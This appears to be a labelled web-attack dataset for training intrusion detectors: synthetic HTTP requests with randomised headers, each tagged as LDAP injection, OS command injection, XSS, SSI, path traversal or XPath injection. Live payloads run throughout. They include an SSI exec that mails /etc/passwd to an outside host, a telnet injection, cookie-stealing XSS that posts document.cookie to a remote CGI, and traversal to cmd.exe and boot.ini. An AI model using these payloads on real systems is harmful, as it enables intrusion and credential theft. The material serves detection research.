Referer: http://www.itnpn.be/Eeyh/eete5/srelmv/leNe/s4Ttmu.txt
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: eBoinofc (jdB4ZY48jz; evGhcpKtA; lKaiUMY)
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7857x018
Via: HTTP/2.4 www.9nee.js
Transfer-Encoding: gzip
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 620 www.gRricn.htm "alTyesjrtent3" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 252851
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37090
Start - Id: 37159
class: LdapInjection
GET /oshypcqloaEeaD/aHbGKM7/er/mt7.gif?yqnoe47PB=9656849&kfte6ojsEm=s4Rzt70flg&oee6a3ywxee52r=jes&AfZD=%29++++%28+%7C+++%28yjelo%3Dosdr*%29&2rgfiiy=nepitTh2cseo&WcfUyV=9&wtuisoioyqnhn=eduO8dtticatsystem&iinhaJ=uoiiae HTTP/1.0
Host: www.natm7hrat.cz
Connection: keep-alive
Accept: text/plain, image/*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: 1rssiss-iu0n;q=0.3
Cache-Control: only-if-cached
Client-ip: 159.233.41.170
Cookie: Cetcrwp-VdropG=317961412;ina=sMqS9LN@TVL;xisterCasnr=96
Cookie2: $Version="25"
Date: Wed, 19 Dec 07 09:52:00 GMT
ETag: W/"HoRX_mVFjHifoQib"
Expect: ltdttsO
From: tshrlW@hlaga0aBB1.de
If-Modified-Since: Tue, 13 Mar 07 03:02:16 UTC
If-Unmodified-Since: Sat, 09 Apr 05 04:56:03 CET
If-Match: *
If-None-Match: "vYThNU@fmW8EKJg"
If-Range: *
Max-Forwards: 652
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Basic MWVwRWFkOmFjMWpuNWFv
Range: 183458-,10781-99705
Referer: /na8mfif.sh
TE: trailers
Trailer: Connection
User-Agent: ccEzuntl
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5776x2501
Via: zvtn/8.9 www.9ylsu.gif, 5.1 32.230.225.208, geSa/9.5 www.hieewem.shtml
Transfer-Encoding: identity
Upgrade: zlraCa/2.6, muoie/6.9
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 57194
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37159
Start - Id: 43564
class: OsCommanding
GET /lb6xshisiTa/hWEgo/0I0yIAH-S/kHepi/sLLXKjGCAXamgBuY_a/libformtyhOxVfhaving3bHB_/gZ/uYIzDQLjitgBZ0rutVH/hpyyO.js?j5SoKRjFUMY=091202276&nDzg4rne7sn=3&er6osdnl8i=%5C%22%5C%3B%5C%2Fusr%5C%2Fbin%5C%2Ftelnet++www.antoveesmama.com+++4708%5C%3B&ZEdcTAJZ=%29n+mochanetcatse3%3Dtwindow.openeev HTTP/1.0
Host: 69.222.29.207
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: efzoit-uieae75q, h764st4o-a2daSe, 8uiarbo-f
Cache-Control: max-age=2644
Client-ip: 32.52.143.48
Cookie: dsdlaaLoee=R&n;tiqhfhnHuaaw=3338507827;xuaefe=asBeaVhncdeuic1us
Cookie2: $Version="2"
Date: Sat, 19 Dec 09 08:58:35 CET
ETag: W/"5iLoNVknU2PXMAfL"
Expect: 100-continue
From: enle@ymn9end.uk
If-Modified-Since: Thu, 02 Feb 06 24:52:44 CET
If-Unmodified-Since: Sat, 10 May 08 24:55:54 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 16 Jan 06 20:57:39 CET
Max-Forwards: 5
MIME-Version: 7.0
Pragma: in=eeY3titb
Proxy-Authorization: szoGA tiskrnt=veetaa
Authorization: Digest qop=auth
Range: -198504,6676-
Referer: /0datee/mEysrt.asp
TE: deflate,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.4 (X11; U; Open BSD i386 8.8; ib-lo; rv:9.8.1) Gecko/81448788
UA-CPU: x86
UA-Disp: 1895,188,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 199x6158
Via: sapdb/2.6 11.80.21.247, FTP/8.8 www.0e5trur.gif, 6.4 100.18.25.84:79
Transfer-Encoding: identity
Upgrade: ogtr/7.3, ctr/1.8, dTuD/9.4, yoltsN/4.0, nt5ae/6.4
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 897186
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43564
Start - Id: 47037
class: XSS
GET /nHG9GVE59RpbXtzxRc93.bin?jneettsfo=5AmTt%409foajgiid&thiyo=e4po&ausrncA=t7t&u6=eeyo&e4auier8=m8ttbi&cxea2vhreV9=xUYas2COq&oeheO=xcbodync&Mn8scriptW1xL=45&slaUNi=ogn&6hoqnrnous6oroc=546563&csieoodsh=il7WXiqIPhQ&eIsc0Eei9=%3Cinput+++type+%3D+%22+image++++%22+++++dynsrc+%3D++++%22+++javascript%3A++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.trtaen.com%2Fcgi-bin%2Fgendlene.cgi%27%2Bdocument.cookie%29%3B%5D+++%22%3E HTTP/1.1
Host: www.sagXshruo.cz
Connection: keep-alive
Accept: audio/basic;q=0.6, text/html;q=0.4, text/html;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: identity, gzip;q=0.2
Accept-Language: *
Cache-Control: max-age=07123
Client-ip: 71.223.100.67
Cookie: sijetNO6bt=riN;rTtaEi=Trioh;YgNnUuS=a>mJt23;ol0sStedtttm4n=pbnftpcOrbb
Cookie2: $Version="73"
Date: Thu, 01 Feb 07 15:07:44 GMT
ETag: W/"Wv1N7CAcXp.A1d0q"
Expect: tbosO4uw=ourpoii
From: hyzyx@lhmoxRAr.net
If-Modified-Since: Fri, 01 May 09 03:39:55 UTC
If-Unmodified-Since: Tue, 06 Mar 07 23:19:30 UTC
If-Match: "8e@KYxU.5mADLniHn1u"
If-None-Match: *
If-Range: "d8zBZtD9r-Kt1cAB4fN"
Max-Forwards: 0721
MIME-Version: 5.6
Pragma: df='h'
Proxy-Authorization: u02e nsohtc=unmnd1b
Authorization: Digest algorithm=MD5
Range: 127-39590,86298-2
Referer: http://www.e8e4ynor.fr/ek8iy/rccsz/gRmnt.cfm
TE: trailers,trailers,chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.6 (compatible; m9uetaih; WinNT; nlyo)
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 7231x6416
Via: 5.3 www.ekpaeiw.png, 8.5 228.221.200.118, 5.6 58.199.120.0
Transfer-Encoding: n6ea
Upgrade: O9ao/9.7, lrhof/0.3, behe2/7.5
Warning: 182 www.tsTbr1.png "pkoij" "Thu, 09 Feb 06 08:59:39 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 40030380327368685
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47037
Start - Id: 39947
class: SSI
POST /ct/nKO7j_Zma/Ohinph/wNQZveDpv7_/ikUFY1h5@ZyrFidHn.gif? HTTP/1.0
Content-Length: 408
Content-Language: aNnnre
Content-Encoding: compress
Content-Location: http://ilwBl3.com/hvnbe/rs6nct/ryoVifzn/li7p.doc
Content-MD5: aWR0amdpZWlzZVVvaW5hZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 07 Sep 08 21:45:40 CET
Last-Modified: Tue, 09 Feb 10 12:23:49 GMT
Host: www.irPo.fr
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: iso-8859-9;q=0.6, windows-1254
Accept-Encoding: compress;q=0.9, deflate;q=0.7, compress
Accept-Language: *
Cache-Control: no-transform
Cookie2: $Version="3"
Date: Mon, 06 Aug 07 02:38:10 UTC
From: uqnas8T@sof2ahapn.cz
If-Modified-Since: Fri, 01 Oct 04 18:06:36 GMT
If-Unmodified-Since: Sat, 19 Aug 06 07:28:32 GMT
If-Range: *
Max-Forwards: 3480
Pragma: no-cache
Authorization: NTLM bHRpc3Rlc2VuTzJyaWN1bW50ZHlhcGxQM29hYWlzc29pdFVuTHlh
Range: -11132
Referer: http://www.lvldsow.be/ifimndoI/tV4ie.pl
TE: gzip,trailers
Trailer: Accept-Language
User-Agent: Mtwp7wa85l (tN7Te3pp; rf3-Vg; drLAfS)
Transfer-Encoding: identity
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2toAohfavrnItab=$oereh9&taccess_logi&&EoeolyRhmhlnneu=idrogroup byn=be9ledNs i&LwinntwaILoR=IseneeatEtmt&S&hrMbbPtasIpqv=tWm&cVOvZUk9.=f Od$&Z@jyWphpsuZ=tTsim7&isNnMcyxneiid=e3-Kq8a&aasihbo=34&a6dos=n?&dawqauntOpisnf=honlaAcue&uus7tiossct=z>ghaving &6ecat=<!--    #exec   cmd="/bin/mail    9umegie.com  <    /etc/passwd"-->&soo=oearnf&idu&FQwn6xtermQJm=ae ou casiO2s

End - Id: 39947
Start - Id: 36712
class: OsCommanding
PUT /nany.C/Tl70dpor2neldit/pP5MBqrBCU/mImKl/t8renunisgususst/iYW86CC4GtKHfAB/idr.exe? HTTP/1.0
Content-Length: 191
Content-Language: oatfAT,uh
Content-Encoding: deflate
Content-Location: http://www.3eseeC8T.biz/encst42e/t8ihu3gt/anatrtEd.shtml
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Jun 06 05:36:36 UTC
Host: www.86pq.it:52
Connection: s6nracRe
Accept: */*
Accept-Encoding: *;q=0.9
Accept-Language: *
If-None-Match: *
Max-Forwards: 446
Referer: /Rasa/Tyfni/st3oe/nwfios/6ttu.mdb
User-Agent: usrylaf1s (sWnt6PMR; mDE0tAhU; 3U.ESU8; r4oXNB; en0TRxO)
X-Serial-Number: 0045248

iswutcD=09500430&Acvseubs9eeo=59762&bbpcslehef=8790242828&boot.iniZfJJbb5St=32359262&drt=393&6ainetNaquz=848963457&6mgm=ueeinmneen&87Pv=|  cat /etc/passwd&Shin=89t&b4osHsaatditj=tus0ueR

End - Id: 36712
Start - Id: 45036
class: PathTransversal
POST /egt/teTehlryuoirw6r/rXPZ/KOXTxeZlHbFCE/IEmTNcmd.bin? HTTP/1.0
Content-Length: 52
Content-Language: cinas4m
Content-Encoding: gzip
Content-Location: http://www.laoto.gov/r2atrvml/hamaB.mdb
Content-MD5: aVNsZWtkNmRydnVyY2JzRA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Feb 09 22:05:18 UTC
Last-Modified: Wed, 06 Dec 06 05:33:31 GMT
Host: www.ajin.fr
Connection: close
Accept: video/mpeg;q=0.6, application/rtf
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, deflate, compress;q=0.5, deflate, deflate;q=0.6
Accept-Language: *
Cache-Control: ban='ocn'
Client-ip: 87.7.212.138
Cookie: cysi=3024004021;IlihpoEmQ=%2e%2e.\%252f/\%252f/...\%252e..%2e;weskneta5tnar=kZoc;iibrrr=aah;wi6newrTotyEc=140883;Mymic=0
Cookie2: $Version="16"
Date: Sun, 12 Jun 05 20:47:48 GMT
ETag: W/"RI9cM84LblOpuWmZolea"
Expect: qcSEnl8y
From: ordn@eEaog7iN6d.st
If-Modified-Since: Sat, 29 Sep 07 12:20:00 UTC
If-Unmodified-Since: Tue, 28 Feb 06 06:10:01 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Jan 10 13:57:47 GMT
Max-Forwards: 732
MIME-Version: 7.0
Pragma: pklf=p2ef
Proxy-Authorization: NTLM aGphYVJvOGZSdDg0ZmVkb2F0R1JobDlsb3VleGxiY3BhcE5ycmNpcDVzZQ==
Authorization: Digest response="4ebDc8Fe71ad5bAf7Cc1FB32782588b6"
Referer: /xqlh/9atbasn/ishbsn/ohces7T8.cgi
TE: trailers,trailers,deflate
Trailer: Date
User-Agent: Mozilla/1.1 (compatible; ohobfr9De; Linux i586; gnrn; igqn)
UA-Color: color16
UA-Pixels: 6325x2725
Via: 4.4 www.anns.js, Ee4t/3.2 www.e7s9efcn.htm, HTTP/6.7 www.tnqd.gif
Transfer-Encoding: deflate
Upgrade: ado/3.2, itnor/6.3
Warning: 517 www.n1bOS.jpg "aaleosr" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qvtt=38&pPjVZJxWjDoj=a9R00TOcN3.n&msehs=pesiuodxeNsu

End - Id: 45036
Start - Id: 38047
class: LdapInjection
GET /alHCMU_aGZ/hiAxYaap.css?icerop4se3=1Oin%29%28++++%7C++++%282advi%3D*%29 HTTP/1.1
Host: 137.5.23.142
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity;q=0.5, deflate;q=0.0
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 26.50.164.170
Cookie: MMn7d=362;pinisewo=hpJxgiAiF;VuUmRphpjGkunionv=xn+ 
Cookie2: $Version="114"
Date: Mon, 01 Mar 04 04:27:19 UTC
ETag: W/"xYZoPZGX1onU_eKg0nd"
Expect: oTo0xsi=menaree;nEnewski
From: deigiel@Ostrbaef.it
If-Modified-Since: Wed, 28 Oct 09 16:23:12 CET
If-Unmodified-Since: Fri, 19 Feb 10 04:04:32 GMT
If-Match: "6DXCmkLeJQ1jlnI"
If-None-Match: *
If-Range: *
Max-Forwards: 30
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dXVnbmU6ZVpob0ppeg==
Authorization: Digest cnonce="cz8e8weo"
Range: 6583-,350-4,-7502
Referer: http://airooh.biz/3wdtzr/njset/gie1na/hOrteco/sEcoo.jsp
TE: trailers,gzip,trailers
Trailer: Warning
User-Agent: nagsiAt/2.8.4
UA-CPU: x86
UA-Disp: 119,1491,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: 1.5 www.nhcoew.jpg, 9.1 www.cels.png, 6.2 238.120.247.76
Transfer-Encoding: gzip
Upgrade: sok/2.9, aiedsC/6.4, uph/8.9
Warning: 961 113.136.152.242 "nasatnD5Noznimfy" "Sun, 16 Apr 06 05:05:21 UTC"
X-Forwarded-For: 136.67.166.110
X-Serial-Number: 94095568311644
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38047
Start - Id: 36352
class: PathTransversal
GET /ilSxt-8/sgF66qBcb66lB/sgodda5tasej/McopyO/c.kM79zqGhXc/oIpD/trlOs3drciienhms/ruyGP/4VOYveCsi0n.cgi?eniunoxogl=Mo%3A%7C&4IHrchildc=+%5Dbnsstdin+fhke&1v4w2demspef6K=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd HTTP/1.0
Host: www.rdcskpsg.it
Connection: close
Accept: application/*;q=0.2, image/jpeg, application/*
Accept-Charset: windows-1251;q=0.7, x-mac-turkish;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: arenr-lee;q=0.6, l7loe-e, teu-neihs9f
Cache-Control: min-fresh=60
Client-ip: 55.153.146.101
Cookie: hlOtpsaewh7re57=1299271;gWmhUg=242398838;l8e9tehhiyhie=i~hsopt[a0d|ev;dFEQLlLAMk=ebtSntrq;1Z5Sncx23VeQ@=er+;lhqiGTh1r=r%8)ies
Cookie2: $Version="7"
Date: Wed, 28 May 08 08:43:52 GMT
ETag: "cfqnbPK5k4tKX2_HzErM"
Expect: 100-continue
From: sotSFlSe@qiksat.biz
If-Modified-Since: Tue, 01 Jan 08 10:25:00 UTC
If-Unmodified-Since: Mon, 16 Jun 08 04:27:27 UTC
If-Match: *
If-None-Match: "wGHp_ettQyCOQsHHdYco"
If-Range: Sun, 24 Apr 05 05:14:51 GMT
Max-Forwards: 57
MIME-Version: 5.3
Pragma: Eo7rmatt=owzPeti
Proxy-Authorization: Basic YXVJbnM6ZWhpcjFndHU=
Authorization: NTLM c2VuZTJzcnJvRXd3bmV4ZXJucnNjYTBkdDBlT2V2dGFhaTh3c2RoYm5hZA==
Range: 75-618834,757-411,77394-267269
Referer: /7toc/c7sswrhe.avi
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/0.1 (compatible; MSIE 6.2; Win98; n0sp; iamrcgrlo; utvEe0e)
UA-CPU: MIPS
UA-Disp: 7628,9010,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 636x8824
Via: FTP/5.9 183.122.153.177, HTTP/1.8 www.tm7w.jpeg
Transfer-Encoding: identity
Upgrade: T8m/5.2, fg1ie/5.0, hrhh/0.4
Warning: 950 204.201.131.138 "a1desoZhspv" "Tue, 31 May 05 11:09:32 CET"
X-Forwarded-For: 217.52.49.74
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36352
Start - Id: 43707
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 205.238.126.57
Connection: lnTm
Accept: image/gif;q=0.4, image/*;q=0.5
Accept-Charset: windows-1250;q=0.6, x-mac-korean;q=0.4, koi8-r, iso-2022-jp
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 131.122.223.243
Cookie: rgipekemUegi=otcaUOaeRre3earab;4Une=216;elfekenohxowe=480
Cookie2: $Version="1"
Date: Tue, 24 Aug 04 04:16:17 GMT
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 100-continue
From: nnlogc@ewfasl3.ch
If-Modified-Since: Tue, 03 Nov 09 10:53:29 GMT
If-Unmodified-Since: Tue, 19 Jul 05 09:48:27 UTC
If-Match: *
If-None-Match: "2sJzH8YrLyPo3VoV"
If-Range: Sat, 22 Apr 06 10:57:09 UTC
Max-Forwards: 13
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: tsoaT mieOyd9e=mWtlue
Authorization: Digest algorithm=MD5
Range: 251-3,844750-,3500-
Referer: /Moa6O/xToqslx/epeOObt/i0IrcmIi.fgf
TE: trailers,trailers,gzip;q=0.7
User-Agent: ihudfts/4.8
UA-CPU: 68000
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5641x613
Via: FTP/3.9 50.200.48.127
Transfer-Encoding: onsdi; RteJ=0Swthec
Upgrade: HweTi/0.0, tten/3.8, hSbn/1.3, sniu/8.5, tfxay/0.5
Warning: 907 www.nh4nvqdc.htm "leoeodrceto" "Thu, 06 Dec 07 08:39:30 UTC"
X-Forwarded-For: 160.206.203.92
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43707
Start - Id: 46801
class: XSS
POST /5MdH8D.ePsformoo/stweietinlueoF/.1yEselectWFI2wQg/rc4_CE/_q_J/oDBvH2qSQ0a@_ioB6/snsil5JQoeJwigtrG/o-fBTvsO9oB/cB/ejDrL1qQuqg4.swf? HTTP/1.1
Content-Length: 347
Content-Language: deco,tnnie,yi59t
Content-Encoding: identity
Content-Location: /uloghseu/heth.txt
Content-MD5: ZWFzb25tYWdqZWV3Y21lcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Mar 07 17:55:29 GMT
Last-Modified: Fri, 19 Feb 10 24:40:55 GMT
Host: 121.66.85.217
Connection: keep-alive
Accept: text/html;q=0.2
Accept-Charset: *
Accept-Encoding: identity;q=0.7, gzip;q=0.5, identity, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 163.182.220.152
Cookie: r.JBkz1_G-Q=o.lVYEW;O7LlWR=rorrOnt;d6e=%
Cookie2: $Version="55"
Date: Tue, 19 Feb 08 18:45:08 CET
ETag: "zdWaUN_28hOSe2q66Mv"
Expect: 100-continue
From: he2rmeQu@ialstesjs.st
If-Modified-Since: Sun, 25 Dec 05 08:20:21 UTC
If-Unmodified-Since: Sun, 27 Mar 05 18:10:36 GMT
If-Match: "kHLu8mdc4Sini@16xaQ"
If-None-Match: *
If-Range: Tue, 20 Dec 05 19:10:32 GMT
Max-Forwards: 997
MIME-Version: 8.1
Pragma: my='datn'
Proxy-Authorization: Basic RDBlQWk6ZWloNg==
Authorization: pHir errlaW5a=wzth
Range: 15-86
Referer: http://ohdebna.net/6luIeEpi/rmcgrjum/fpci/2n04ARro.jsp
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.5 (Machintosh; U; PPC 8.0; sO-sr; rv:4.7.0) Gecko/87654259
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 818x5674
Via: 2.5 64.74.41.231, FTP/3.7 www.erecoa.htm, coli/5.6 185.118.118.60
Transfer-Encoding: compress
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
Warning: 628 www.gpeent.gif "bdfniiksnrsxp" 
X-Forwarded-For: 254.13.104.181
X-Serial-Number: 80684101
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

eefmarn=ef&swNrEa=xinputoT2yat&ecns=37877&87=g&ahnE8=1756625&RkGWnullsRhomehP5z=<input  type    =  " image"     dynsrc    = " javascript:  [document.location.replace ('http://www.is.com/cgi-bin/ti.cgi'+document.cookie);]   " >&qfcirk9eo=gza1Q4Sm&Mlt9dnhsyaght=Rsma5siahwgettEefl?y@1&jadmin4xtermJO=9

End - Id: 46801
Start - Id: 44203
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.1
Host: www.g78rSa.ch
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: big5, x-mac-japanese, windows-874
Accept-Encoding: 
Accept-Language: rnl-Tlspe, cm48I-r;q=0.0
Cache-Control: max-stale
Client-ip: 56.183.96.43
Cookie: iWchlddpne7sn=mvod8vnwee;r@eVYwinnt%uiE=52358
Cookie2: $Version="370"
Date: Thu, 03 Dec 09 12:42:57 UTC
ETag: "wFfcy3k9UPL1p_h.3m"
Expect: yoeh
From: rOaz@gEadsxsee.biz
If-Modified-Since: Sun, 26 Nov 06 05:28:15 CET
If-Unmodified-Since: Sat, 04 Mar 06 13:12:06 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 11 Mar 10 01:58:51 CET
Max-Forwards: 7
MIME-Version: 0.4
Pragma: n='kusw'
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: 9w0nEe Hqmzed=bebg
Range: 22399-
Referer: http://www.siolorea.biz/fasxT5.jpg
TE: chunked,trailers
Trailer: Referer
User-Agent: Mozilla/4.1 (Windows; U; WinNT 8.1; ei-bz; rv:6.3.3) Gecko/72805720
UA-CPU: PowerPC
UA-Disp: 0876,3818,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 953x6132
Via: 8.5 www.6p3fld.tiff:98888
Transfer-Encoding: identity
Upgrade: mrn/4.8, niDaor/3.7, h2u/1.0
Warning: 500 167.56.88.243 "a4steEosrC3cbant" "Thu, 15 Jul 04 08:17:33 UTC"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44203
Start - Id: 45742
class: PathTransversal
GET /hj2eCLjuyP-_Y/ee8fnig3NsnDCrnhsei/uvWJ7x862m4T4/qheheorerl/ibw/oojiusrtintgirrarht/dahet6eedqs6r1testf/scr@MSh/L9dsntpnwb8oUj/og/ZLprocessing-instructionEimgjXQgroup byiB.dll?soeoacne9treo=+drdelete&tver=r%3A%5Cwinnt%5Cboot.ini HTTP/1.0
Host: www.ssiu0.uk:80
Connection: mee0nd
Accept: video/*;q=0.6
Accept-Charset: windows-874;q=0.7, iso-8859-9;q=0.1, iso-8859-7
Accept-Encoding: gzip, identity;q=0.6, gzip;q=0.3, compress;q=0.0, identity;q=0.7
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 90.173.15.184
Cookie: trmhaen=cb
Cookie2: $Version="34"
Date: Fri, 16 Sep 05 14:54:49 UTC
ETag: W/"MmZYP5uH2Z8Y7FOUG_"
Expect: a3ieu
From: eyebc4et@nriRuu.de
If-Modified-Since: Sat, 03 Sep 05 09:02:23 CET
If-Unmodified-Since: Wed, 13 Jan 10 04:52:02 UTC
If-Match: "bLbXfUfEmhZKj7Kq3"
If-None-Match: "GbAVIE@s-Vfjv0j"
If-Range: "DOB0sUVqtvkbHIw"
Max-Forwards: 2
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: NTLM dHJudWdOZGlIbGNwaW5ic0RlaGRobmtzbnhkbG9pcmMxb21laWlUZWxodGt0
Range: -500252,934-3694
Referer: http://www.si2O.biz/yertia/3furhf.swf
TE: gzip;q=0.5,deflate;q=0.0
Trailer: User-Agent
User-Agent: Mozilla/5.8 (Machintosh; U; PPC 5.5; on-sD; rv:1.6.8) Gecko/99554752
UA-CPU: Sparc
UA-Disp: 797,3668,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 979x8035
Via: HTTP/7.3 152.107.181.213, 1.6 www.ooynE4sM.gif, 3.6 154.120.161.205:5
Transfer-Encoding: Iyys; d6endwv=tx0d
Upgrade: 8ohae/0.1, hh7/2.7
Warning: 198 5.109.101.104 "kAoaslle" 
X-Forwarded-For: 187.241.210.252
X-Serial-Number: 3591562194850483
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45742
Start - Id: 37024
class: LdapInjection
GET /Ultd3laaEorrlezmuot/e16oezatoyrihailo/cajomonrsl/hTQH/7uTayuYio.htm?vwhdH=htsadminCeaeic+eye&rnew3a=SeT%5Cr&c5=btDekhsXncateojXfromsc&aee7uaI=%29+%28%7C+%28feu%3Dkcos*%29&tsuk9=dJelhHn-2i8hwft&ntleee0ais4eU9=np HTTP/1.0
Host: www.bra4oHoIUe.fr
Connection: slornnc
Accept: */*;q=0.2
Accept-Charset: euc-jp
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 35.224.123.165
Cookie: h2Pi@bzgroup by-Mr=rufeoHs;weaba=t5Ltv;b2Dfehtas2sl=o7ume;tnsd7Sht=28520290;rstQ3=t;ipoOn=nseoetfomme
Cookie2: $Version="984"
Date: Tue, 01 Apr 08 21:13:12 GMT
ETag: "jEmkR7sWTC8XP20D"
Expect: kodtt
From: B3nrc@Ecode1.gov
If-Modified-Since: Mon, 02 Apr 07 05:03:52 CET
If-Unmodified-Since: Mon, 26 Feb 07 07:31:34 GMT
If-Match: *
If-None-Match: *
If-Range: "Wk1lLHqcpzEConC"
Max-Forwards: 31
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 7leiRa otmjthT=taes
Range: 952638-,75883-52
Referer: http://dsmTyzau.biz/8yad/solirae/Boty5bh/ifaoio/Ee6tpa.doc
TE: chunked;q=0.0,chunked;q=0.6,gzip;q=0.7
Trailer: Accept-Charset
User-Agent: i-lRifXVT http://www.o2am.com
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: 0.7 204.253.165.17
Transfer-Encoding: identity
Upgrade: ieoez/4.0, enkhu/2.3
Warning: 561 255.42.223.99:0 "naeetom" "Sat, 31 Jul 04 14:02:35 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37024
Start - Id: 35833
class: XPathInjection
GET /eotzosdn9AsSmeciSe/If-bUHyL7DN.shtml?ye=9830+or+++++e%2Fmea%2FVt%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D0%5D+++or+++++7%3D HTTP/1.0
Host: www.linneyeo.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.8, deflate, gzip;q=0.0
Accept-Language: eh2olbct-rsu, 3HbiYty-s8o, h-0, uErits-tOa9;q=0.5, bsonTn5B-p
Cache-Control: max-age=3
Client-ip: 48.181.108.67
Cookie: rtbhesl=et2irxr2hgsmew7hMX;sk=l 5a);hyeSoe='uce o nEre;hs9tnma=r?c@;iAughsa=4;ea=akW@57JLwM
Cookie2: $Version="38"
Date: Fri, 10 Aug 07 13:29:45 CET
ETag: "mUWr_rP0r53hp.28cK@"
Expect: saaE
From: t6Hzyl@dtgtOents.biz
If-Modified-Since: Tue, 29 Jan 08 06:52:09 UTC
If-Unmodified-Since: Wed, 11 Feb 04 03:19:00 GMT
If-Match: *
If-None-Match: "5yag.gWssq16.6U"
If-Range: "CPtSW96gANhgTA4m8@W"
Max-Forwards: 36
MIME-Version: 8.2
Pragma: taliu=rnh
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="ptan"
Range: 77-,-9
Referer: http://rtnph.ch/2athw.mp3
TE: chunked,deflate;q=0.7
Trailer: Connection
User-Agent: Mozilla/1.4 (Windows; U; WinNT 9.5; at-bg; rv:7.4.1) Gecko/37633999
UA-CPU: MIPS
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
